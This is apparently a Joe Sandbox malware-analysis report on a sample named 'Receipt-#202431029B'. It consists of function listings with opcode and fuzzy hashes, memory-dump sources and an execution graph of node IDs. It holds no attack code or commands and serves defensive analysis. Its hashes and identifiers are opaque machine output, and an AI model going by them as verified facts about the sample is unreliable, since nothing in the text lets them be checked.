                                                                  • Opcode ID: abb14afcdb4f3f5786590bd4392091c900e6e919d1b811b6d40a5147a8f9dc94
                                                                  • Instruction ID: beb0ccd5790145d60e86d9bb867c8b7a46e4ad977c27e1dfda01016da6e4b2ea
                                                                  • Opcode Fuzzy Hash: abb14afcdb4f3f5786590bd4392091c900e6e919d1b811b6d40a5147a8f9dc94
                                                                  • Instruction Fuzzy Hash: C8E092741296428FD302DB64C8656667BB1EF46304F14C48694968B2A7CA30A80AC765
                                                                  Function 072EC092 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cabb20676926655854e7d8b4afe7cea1f3797a253e1abbb9efb76da0911c831a
                                                                  • Instruction ID: 7e90eff78071d57913f1707b72279abcbd7551b0be3775b349fdeb75a0c5020c
                                                                  • Opcode Fuzzy Hash: cabb20676926655854e7d8b4afe7cea1f3797a253e1abbb9efb76da0911c831a
                                                                  • Instruction Fuzzy Hash: 53D05EE127C354CACA0292F4D6341B52F7DDA4B201FA4048BD40B86442E5A188854673
                                                                  Function 072E9D88 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69fdc05c12680f20492cc24658f7c341255373e8fe23c0b5a446ff90f656d0e8
                                                                  • Instruction ID: 1c14a39fe423747d63ce216869ab9b3a7e0cf2f23a03add8838d80571b039d26
                                                                  • Opcode Fuzzy Hash: 69fdc05c12680f20492cc24658f7c341255373e8fe23c0b5a446ff90f656d0e8
                                                                  • Instruction Fuzzy Hash: 87D05BD023C134C7CA5C3664541C63971AF5782700FD0446355C7452C6DDE2FCD14173
                                                                  Function 072EB8F8 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5aed13177021ce02443b8ac48de72a3ffe0b48f5665984318516ddfecf42401d
                                                                  • Instruction ID: f45f4c17697855ecdb0306b4580c67b4f6d3319ef083f525d5e69d9fc2e1a2c9
                                                                  • Opcode Fuzzy Hash: 5aed13177021ce02443b8ac48de72a3ffe0b48f5665984318516ddfecf42401d
                                                                  • Instruction Fuzzy Hash: A1D05EE0E3C10CDB4320AAD96440D3A36ECA747221FD04842980F8B344D9E15B005FF3
                                                                  Function 072EC2E0 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf00d02595091b334ac6dc77ca583a0cce36c3dba8113ba820bf046e61276bbe
                                                                  • Instruction ID: 913cab11e3f0afb9450b15ff4bb9b274a37670c1b4ffb125726f0ad55172176a
                                                                  • Opcode Fuzzy Hash: cf00d02595091b334ac6dc77ca583a0cce36c3dba8113ba820bf046e61276bbe
                                                                  • Instruction Fuzzy Hash: A2D0C79517D3CC9BC70221F564255F57F7DA407515B4500DBE14A7A853468144C58677
                                                                  Function 072EC0D6 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a94fbb14c9e43727d0b53e92cdc44f30edeef00569683d58c2621619974b5a3
                                                                  • Instruction ID: e13287ab2dc6c507fa12d717a34797f004275a9233f7596e06b6fa7aff80ce55
                                                                  • Opcode Fuzzy Hash: 3a94fbb14c9e43727d0b53e92cdc44f30edeef00569683d58c2621619974b5a3
                                                                  • Instruction Fuzzy Hash: 73D0C2E067C108DF8720CAD5D520526329EE74A301F908047D90BE6644CAA089910672
                                                                  Function 072EAE9B Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60e190d683df0840c858a33b83479094fd2015a3fb438877d041cfd1a877b188
                                                                  • Instruction ID: 61417c2c7afcdb479982a57ebf3b2cfb8c44eb08bb0d6b0f11f10e99d53d894f
                                                                  • Opcode Fuzzy Hash: 60e190d683df0840c858a33b83479094fd2015a3fb438877d041cfd1a877b188
                                                                  • Instruction Fuzzy Hash: 69E01AB1D297858FC705CF78C9A66A9BFB5BE42214B18D0ABD0689B217C7305516CB82
                                                                  Function 072E0DF8 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 31ddfbdbf8bed6725c2b1514509cd2e60424a29faf4ea75eac026451fc9de07e
                                                                  • Instruction ID: fadaeb72ac14c39394cb04f39b5b91901f63092ff62974b959b0a0a6e6eab509
                                                                  • Opcode Fuzzy Hash: 31ddfbdbf8bed6725c2b1514509cd2e60424a29faf4ea75eac026451fc9de07e
                                                                  • Instruction Fuzzy Hash: A7E0177182061DDECB50EF78D90859E7BE8AB05220F50C53AE94D9A110FA70D6E8DF90
                                                                  Function 072E20D8 Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a231ec28cc250be00bf7d724263f4d2f5b74160a48bc868a32810e113e003ff
                                                                  • Instruction ID: 7b9bdd55710d1b3fe4650cad3fd9449d455ccf9fa68462100402c80c571b258a
                                                                  • Opcode Fuzzy Hash: 5a231ec28cc250be00bf7d724263f4d2f5b74160a48bc868a32810e113e003ff
                                                                  • Instruction Fuzzy Hash: 7FD0A734B0030A8793006FB269167BA33DEEB84601745C054E70BC63D1CF38ED019211
                                                                  Function 072EA2A8 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 486d65328a31622e9c8e9b2d40c3df8e21ccbced81e913475cdd811c7ef56f6a
                                                                  • Instruction ID: 00fe1186dab52dbeaeda2ced37e71cbcd9d8c6201049242cba1f5a9ddff4727a
                                                                  • Opcode Fuzzy Hash: 486d65328a31622e9c8e9b2d40c3df8e21ccbced81e913475cdd811c7ef56f6a
                                                                  • Instruction Fuzzy Hash: 1BC08CB3279AA10FE30292A03C212B55B7046A3A0034C80E3C184E015380204119C373
                                                                  Function 072EC0A0 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ab680c7d13ff7f527697c3115cbd5ba9aad24000db5b0347f137b9eb1c752fb
                                                                  • Instruction ID: 37bf71f0363634ab1dddee91a0df28bd80522a345a21278f6204624ac7384061
                                                                  • Opcode Fuzzy Hash: 7ab680c7d13ff7f527697c3115cbd5ba9aad24000db5b0347f137b9eb1c752fb
                                                                  • Instruction Fuzzy Hash: 7DC08CF023C20CCB8A00E1E8D43483D36AEE68B301FE04407D60F82541EED28CC00573
                                                                  Function 072E6681 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9476c687dd1ecd09db850d3c133a4a8d05d6f70ada061862d7e40b209548a79
                                                                  • Instruction ID: 1800bf2e23ebadf1ef14f59a3528249474cde9e377ade846bf4f6eaf419d6eec
                                                                  • Opcode Fuzzy Hash: b9476c687dd1ecd09db850d3c133a4a8d05d6f70ada061862d7e40b209548a79
                                                                  • Instruction Fuzzy Hash: BAC012A103D3DA9EC35616A0B8091F33F38AA1302934B10DBE4458C853C2AD18E0C7A2
                                                                  Function 072EE428 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c0963c1fab0c71c556159b43e8da5f199446a9f290985146287a4826e2803d7
                                                                  • Instruction ID: f90f18f2597165da655d4968b8c57f1c4337110f2b3aad6a30119704545de581
                                                                  • Opcode Fuzzy Hash: 3c0963c1fab0c71c556159b43e8da5f199446a9f290985146287a4826e2803d7
                                                                  • Instruction Fuzzy Hash: C4C02BB04033098FC2002BF8F80E374377CB700302FC40010E20C01470AB780884C7A1
                                                                  Function 072EBCB0 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 747ef7d74b6b94cc1065721aef3ebeee5c9538b3498658fddf1658a282307ee1
                                                                  • Instruction ID: 51cb1f1f3108f527b7d78237edc64e8ad21b4f57e6241791100927a901cff596
                                                                  • Opcode Fuzzy Hash: 747ef7d74b6b94cc1065721aef3ebeee5c9538b3498658fddf1658a282307ee1
                                                                  • Instruction Fuzzy Hash: EBD0C9B2828190DFC300CB91ED9AC883BF0BE1E201B05198AC0059B262D224A8118F81
                                                                  Function 072EC2F0 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d49a4b845fd8f84b8855b27a1e9688e3a787aa318db8827001255cb17e0b636a
                                                                  • Instruction ID: 24fd5195d3871065ea886608c3df371a11f6db458daf58b000269360981de521
                                                                  • Opcode Fuzzy Hash: d49a4b845fd8f84b8855b27a1e9688e3a787aa318db8827001255cb17e0b636a
                                                                  • Instruction Fuzzy Hash: 54B011E803C2CCC30E0032EB202823A3A2E300BA00FE00022A20F30C020FC2A8E200B3
                                                                  Function 072E770C Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f71367349d6a25a5bf38c2b72a1a2ed44c5c938c04f334edea391242702eb55e
                                                                  • Instruction ID: 09ce832317456f2dcf9fe0c690d12b489d531335f02f63f16569da6f4cc79a34
                                                                  • Opcode Fuzzy Hash: f71367349d6a25a5bf38c2b72a1a2ed44c5c938c04f334edea391242702eb55e
                                                                  • Instruction Fuzzy Hash: 0EB012F51B9600E3840067B44C94A3A5DA4EBB2711FC0DD12334C20024C5B14428D737
                                                                  Function 072EB9C1 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bfed8b8dd9daf1429b10a7f82c20e339baf44a1ca279fb96c56bee4d723455b6
                                                                  • Instruction ID: 948dea2f00afe27453ca24843879316d63896e05fe809586d1476bacd1c92436
                                                                  • Opcode Fuzzy Hash: bfed8b8dd9daf1429b10a7f82c20e339baf44a1ca279fb96c56bee4d723455b6
                                                                  • Instruction Fuzzy Hash: F4C08CF0F70219EFDB008A40EE5BDAC326AAB06E01F411010A20226184C2A04A008E00
                                                                  Function 072E6690 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5444c956c4d33cc15ae8404feffb36fe8532ee260315ffa511c9661b5e472f3a
                                                                  • Instruction ID: 9354b52c61d90c3ac1dff050f8935b530e71e090b48733e13c8580b6e380f0c8
                                                                  • Opcode Fuzzy Hash: 5444c956c4d33cc15ae8404feffb36fe8532ee260315ffa511c9661b5e472f3a
                                                                  • Instruction Fuzzy Hash: D8A011A003828ECA82082280B00E23A3F3C2222208B800008E80A08802EAAEB8300288

                                                                  Non-executed Functions

                                                                  Function 08B36D08 Relevance: 8.0, Strings: 6, Instructions: 496COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'dq$4'dq$4'dq$4|iq$4|iq$$dq
                                                                  • API String ID: 0-2773531318
                                                                  • Opcode ID: be0790da3369e198cc8cefa28fa2362f14f30874f43a0ce39ef24e9a1ec3f69d
                                                                  • Instruction ID: f24d0984189c33cc286a26b20f6a52b5944a92d18eb5c9239ad22c5ccb82ba58
                                                                  • Opcode Fuzzy Hash: be0790da3369e198cc8cefa28fa2362f14f30874f43a0ce39ef24e9a1ec3f69d
                                                                  • Instruction Fuzzy Hash: C8F1D2757002259FCB29DF68C89462E7BE2EF8630272544EDE406DB361CF31DC428BA5
                                                                  Function 08B31230 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: 5604d8c815b5385b3d8ff81825c2f447ca9b7ea547bc13b14c1fceef0aa50caa
                                                                  • Instruction ID: de3ec757f3c22d9c91632d724c4329662295dd55feb035da0d05e365e5d7b734
                                                                  • Opcode Fuzzy Hash: 5604d8c815b5385b3d8ff81825c2f447ca9b7ea547bc13b14c1fceef0aa50caa
                                                                  • Instruction Fuzzy Hash: FF51D775D04628DFDB24DF6ACC407DABBB6AB89311F40C1EAD41CA7254DB345A86CF40
                                                                  Function 07573168 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74f6a831d0219da726a975f6bb1a729580e426b2b8b7c4d2262e9c85733602d8
                                                                  • Instruction ID: d4a7ddb14386da2f38985154ae270506006dd9f4c5873c148e2d659f17f34ed7
                                                                  • Opcode Fuzzy Hash: 74f6a831d0219da726a975f6bb1a729580e426b2b8b7c4d2262e9c85733602d8
                                                                  • Instruction Fuzzy Hash: D2E119B4E001598FCB14DFA8D580AAEFBF2BF89314F24C169D814AB355DB31A941DF61
                                                                  Function 07572D30 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 838d4ed211eae573f03e1743b525f7d83142c4cd009346e537c0e7929801061a
                                                                  • Instruction ID: e751bb203db21d83f50d5f7e31fe77f9e2e39f3ac818d1636f7c917e391bb7a6
                                                                  • Opcode Fuzzy Hash: 838d4ed211eae573f03e1743b525f7d83142c4cd009346e537c0e7929801061a
                                                                  • Instruction Fuzzy Hash: B7E1E7B4E001598FCB14DFA9D580AAEFBF2BF89305F24C169D814AB355D731A942CFA1
                                                                  Function 075755F8 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3a00717825f52160ef5861f0d94fe399657784d1bd3602605143083a3c50a56
                                                                  • Instruction ID: 19061ad2229abefb53fc547f25020f2b65e5ce261786a715e51939c3f801d9ae
                                                                  • Opcode Fuzzy Hash: a3a00717825f52160ef5861f0d94fe399657784d1bd3602605143083a3c50a56
                                                                  • Instruction Fuzzy Hash: 17E1F8B4E001198FDB14DFA9D580AAEFBF2BF89305F24C569D814AB355DB30A941CFA1
                                                                  Function 075735A0 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0181262c7bb8f95cd912978ed1d7b119e1382e4f88fdc3a2841c2f64b21adb17
                                                                  • Instruction ID: a62d80912cfc107b8c8702867586af467154b3ac67f672434e7cb92f5a9d3242
                                                                  • Opcode Fuzzy Hash: 0181262c7bb8f95cd912978ed1d7b119e1382e4f88fdc3a2841c2f64b21adb17
                                                                  • Instruction Fuzzy Hash: 6EE1F6B4E001598FCB14DFA9D580AAEFBF2BF89314F24C169D814AB355DB30A942DF61
                                                                  Function 07574C48 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0482aade48582afa892f86cb9aa7c11b36d3d6b6d1842f3ca97eba871b92a7fb
                                                                  • Instruction ID: 0b5655a3a3fc4d5fe75d41f40deb9129a97fbef78d8462b5fd8a080fd65d6171
                                                                  • Opcode Fuzzy Hash: 0482aade48582afa892f86cb9aa7c11b36d3d6b6d1842f3ca97eba871b92a7fb
                                                                  • Instruction Fuzzy Hash: 0EE1E7B4E001598FCB14DFA9D590AAEBBF2FF89305F24C169D814AB355D730A942CFA1
                                                                  Function 00A2E124 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b1d0045b5f9fc6771db882ca7783da8016d47237cdd9801251fc0dfcccc1e12
                                                                  • Instruction ID: 2e673f87fdfcac571df4b25758a7c64f1c324516994ba859ec632507591ef983
                                                                  • Opcode Fuzzy Hash: 7b1d0045b5f9fc6771db882ca7783da8016d47237cdd9801251fc0dfcccc1e12
                                                                  • Instruction Fuzzy Hash: F0A15D32E00229CFCF19DFB8D9405AEB7B2FF95300B15857AE805AB265DB71E955CB80
                                                                  Function 05726BB0 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd201a0eaf8a82c0557aa5872f908201a8495c156f4c4ac47f14190c9dd780fa
                                                                  • Instruction ID: 2495ea9ed68165c6b6d4cbb52395b032f5c79af2680dd7e1ed0a5cfb3c1373fb
                                                                  • Opcode Fuzzy Hash: dd201a0eaf8a82c0557aa5872f908201a8495c156f4c4ac47f14190c9dd780fa
                                                                  • Instruction Fuzzy Hash: FFD10A3592075ACACB10EB74D950A99B7B1FF96300F51CB9AE44937224FB706AC9CB81
                                                                  Function 05726BA2 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 357cf27dc2dca4a6b77c73662afcece8690d59a77dd2e3c49f21e2c73547b35c
                                                                  • Instruction ID: e45dcceac7c33f33483e7ed6a77af26a04efeae7f627cf3cb626b311608ecf1c
                                                                  • Opcode Fuzzy Hash: 357cf27dc2dca4a6b77c73662afcece8690d59a77dd2e3c49f21e2c73547b35c
                                                                  • Instruction Fuzzy Hash: 52D10A3592075ACACB10EF74D950A99B7B1FF96300F51CB9AE44937224FB706AC9CB81
                                                                  Function 07574C37 Relevance: .1, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a2fd89928254ee620cc09dc75cc38ce98dd53e35b29e7ad82553e8400e66c1b
                                                                  • Instruction ID: 534e6e27b9d24a0df8e9b11d09f4650760b623ac683322acd5b5a6ba9daed575
                                                                  • Opcode Fuzzy Hash: 4a2fd89928254ee620cc09dc75cc38ce98dd53e35b29e7ad82553e8400e66c1b
                                                                  • Instruction Fuzzy Hash: D9510BB4E002598BCB54CFA9D5809EEBBF2FF89304F24C16AD458AB355D7315941CFA1

                                                                  Execution Graph

                                                                  Execution Coverage:12.1%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:287
                                                                  Total number of Limit Nodes:14
                                                                  execution_graph 41203 139b0a8 41204 139b0ee 41203->41204 41208 139b288 41204->41208 41211 139b277 41204->41211 41205 139b1db 41215 139af20 41208->41215 41212 139b288 41211->41212 41213 139af20 DuplicateHandle 41212->41213 41214 139b2b6 41213->41214 41214->41205 41216 139b2f0 DuplicateHandle 41215->41216 41217 139b2b6 41216->41217 41217->41205 41218 1395ee8 41219 1395ef7 41218->41219 41220 1395f02 41219->41220 41223 139a038 41219->41223 41227 139a028 41219->41227 41224 139a047 41223->41224 41231 1399c28 41224->41231 41228 139a02d 41227->41228 41229 1399c28 4 API calls 41228->41229 41230 139a068 41229->41230 41230->41220 41232 1399c33 41231->41232 41235 139ce70 41232->41235 41234 139d716 41236 139ce7b 41235->41236 41237 139e54c 41236->41237 41240 53727b8 41236->41240 41245 53727c8 41236->41245 41237->41234 41241 53727c8 41240->41241 41242 537280d 41241->41242 41250 5372978 41241->41250 41254 5372958 41241->41254 41242->41237 41246 53727e9 41245->41246 41247 537280d 41246->41247 41248 5372978 4 API calls 41246->41248 41249 5372958 4 API calls 41246->41249 41247->41237 41248->41247 41249->41247 41251 5372985 41250->41251 41252 53729be 41251->41252 41258 5370620 41251->41258 41252->41242 41255 5372985 41254->41255 41256 53729be 41255->41256 41257 5370620 4 API calls 41255->41257 41256->41242 41257->41256 41259 537062b 41258->41259 41261 5372a30 41259->41261 41262 5371bac 41259->41262 41263 5371bb7 41262->41263 41264 5372aae 41263->41264 41270 5372b18 41263->41270 41274 5372b08 41263->41274 41278 53748b0 41264->41278 41283 53748c0 41264->41283 41265 5372ad9 41265->41261 41272 5372b46 41270->41272 41271 5372c17 41272->41271 41273 5372c12 KiUserCallbackDispatcher 41272->41273 41273->41271 41275 5372b0d 41274->41275 41276 5372c12 KiUserCallbackDispatcher 41275->41276 41277 5372c17 41275->41277 41276->41277 41280 53748c0 41278->41280 41279 53748fd 41279->41265 41280->41279 41289 53758c7 41280->41289 41299 53758d8 41280->41299 41285 53749f1 41283->41285 41286 53748f1 41283->41286 41284 53748fd 41284->41265 